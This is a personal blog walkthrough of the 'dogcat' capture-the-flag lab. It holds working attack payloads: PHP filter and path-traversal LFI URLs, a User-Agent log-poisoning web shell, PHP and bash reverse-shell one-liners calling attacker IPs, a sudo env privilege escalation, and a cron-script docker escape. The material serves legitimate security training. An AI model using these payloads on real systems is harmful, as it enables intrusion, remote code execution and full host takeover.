As always, I'm a Dad with a full time job and other tasks to do during the day. You'll likely notice IP's being different and consoles from different systems. This is because I get interrupted quite often and have to try and get this done here and there when I can.I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.
We'll start out with the regular nmap scan. The sacn shows an ssh port and an apache website.
Oh, surprise! A website. I bet it's about dogs and cats. Yup. Look at that.
Looks like we have two buttons, each one shows us a picture that changes each time it's clicked. The URL looks to change the value of 'view' depending on the button that's clicked. If we change the value to something other than the two options we see this:
It looks like it's going to try and include a php website named whatever the value is. It also gives us the location of where this file will be: /var/www/html as well where the include_path is: :/usr/local/lib/php.
There's no robots.txt file but doing a gobuster finds us some interesting files
I tried to go to flag.php and the page is blank. I tried with curl a manual view and to import with the view variable. The closest I could come to something was adding the %00 bit to knock off the file extension. I can add it back in but it doesn't actually include.
http://10.10.230.54/?view=index.php%00dog One of the walkthroughs (yeah, I had to check this one out to move forward) suggested this page: https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/ the basic's here (cause this page will give you a security warning) to view the source code of any PHP file was to use the function :
php://filter/convert.base64_encode/resource which has been available since PHP 5.0.0. We can decrypt it later. Here's how we would use it according to his example:
http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index We do this to the URL (because it has to have the word dog or cat in the URL somewhere:
http://10.10.230.54/?view=php://filter/convert.base64-encode/resource=dog
decoding it gives us this
echo PGltZyBzcmM9ImRvZ3MvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0K | base64 --decode
<img src="dogs/<?php echo rand(1, 10); ?>.jpg" />Ok, well this is promising... now... how to figure out how to bypass this dog/cat need. I won't lie... I had to look at a walkthrough for this... and I'm embarrassed because it's really quite easy. Here's what I had to change:
http://10.10.86.59/?view=php://filter/convert.base64-encode/cat/resource=flageither way, we got the base64 encoding of that flag.php file we found with gobuster:
Decoding it gives us the flag
Ok... well I had to check the walkthrough again... and AGAIN I overlooked something but there was a touch of something I didn't know. One, we CAN do a URL change to check out the file system - which I had tried to do earlier without avail. What I was missing was including the ext variable in the url to equal nothing.
http://10.10.4.78/?view=php://filter/convert.base64-encode/cat/resource=dog/../../../../../../etc/passwd&ext=That gave me a base64 encoded string. Decoding it gives me their passwd file:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
Makes me wonder if I can get the shadow file too.... damn. Nope. Going back to the walkthrough he pointed out that because we're now negating the extension we can simplify the URL injection like this:
http://10.10.4.78/?view=./dog/../../../../../../etc/passwd&ext=I had to read this guys walkthrough about log poisoning (Dogcat - TryHackMe (ecrax.github.io)). Basically we're going to view the Apache log file output. What he noticed in the apache log file was that it logs the user agent of the browser making the request. If we modify the user agent with some PHP, asking it to run a local system command as a variable then it should run that code on the local box and out put it to the screen.
So first, the apache log file view:
http://10.10.4.78/?view=./dog../../../../../../var/log/apache2/access.log&ext= then we opened the browser developer tools, found the get request under 'network' and right clicked it. We choose edit and resend and modify both the URL and the UserAgent. Here's what the URL should be and the agent:
http://10.10.4.78/?view=./dog../../../../../../var/log/apache2/access.log&ext=&n00b=whoami
<?php system($_GET['n00b']);?> <--User agent
Now when we search the page, we can see the command output. Very fancy.
OK, so the rest of this was a pain in the ass. I had to keep resending with various ls commands to find the the flag file. Here's the second flag location based on those ls's.
http://10.10.4.78/?view=./dog../../../../../../var/log/apache2/access.log&ext=&n00b=cat%20..%2Fflag2_QMW7JvaY2LvK.txtOK. This is ridiculous. We need to get a shell on this. I tried issuing a wget command to a PHP reverse shell I had hosted and also tried to nc into my listener... nada. I got annoyed with Dev Tools and swapped over to BurpSuite and a URL encoded PHP reverse shell I was able to get one.
The listener on my attack box:
nc -lvnp 1234The PHP Reverse Shell:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'The Request sent in BS after URL encoding it ( https://meyerweb.com/eric/tools/dencoder/ ):
Once we're in the shell, I poked around a bit but quick glances I wasn't able to get far and there's nothing in the home directories. I was able to see that we do have some sudo permissions:
$ sudo -l
Matching Defaults entries for www-data on ef0ea4376574:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on ef0ea4376574:
(root) NOPASSWD: /usr/bin/env
$ ls -la /usr/bin/env
-rwsr-sr-x 1 root root 43680 Feb 28 2019 /usr/bin/envGTFOBins gave us something to use on that and let us find the third flag
$ sudo /usr/bin/env /bin/sh -p
pwd
/home
cd /root
ls -la
total 20
drwx------ 1 root root 4096 Mar 10 2020 .
drwxr-xr-x 1 root root 4096 Nov 18 20:17 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-r-------- 1 root root 35 Mar 10 2020 flag3.txt
cat flag3.txt
Searching the entire disk for anything named flag* turned up only the three flags I've already found...
I notice there's a .dockerenv folder in there, which tells me this is a docker client. Searching around and reading a bit more on the other walkthroughs, we see some backup stuff in the /opt directory - which leads me to believe this is run by, what I assume, is the docker app somewhere on the device. cat'ing the file we see this:
cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/containerWe start a new listener with a different port
nc -lvnp 4444So of course we put append our one-liner reverse shell in there and wait.
echo "bash -i >& /dev/tcp/10.6.27.189/4444 0>&1" >> backup.shWithin a minute we have our reverse shell and our last flag.
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.6.27.189] from (UNKNOWN) [10.10.109.254] 39640
bash: cannot set terminal process group (5778): Inappropriate ioctl for device
bash: no job control in this shell
root@dogcat:~# ls -la
ls -la
total 40
drwx------ 6 root root 4096 Apr 8 2020 .
drwxr-xr-x 24 root root 4096 Apr 8 2020 ..
lrwxrwxrwx 1 root root 9 Mar 10 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Apr 8 2020 .cache
drwxr-xr-x 5 root root 4096 Mar 10 2020 container
-rw-r--r-- 1 root root 80 Mar 10 2020 flag4.txt
drwx------ 3 root root 4096 Apr 8 2020 .gnupg
drwxr-xr-x 3 root root 4096 Apr 8 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Mar 10 2020 .selected_editor
root@dogcat:~# cat flag4.txt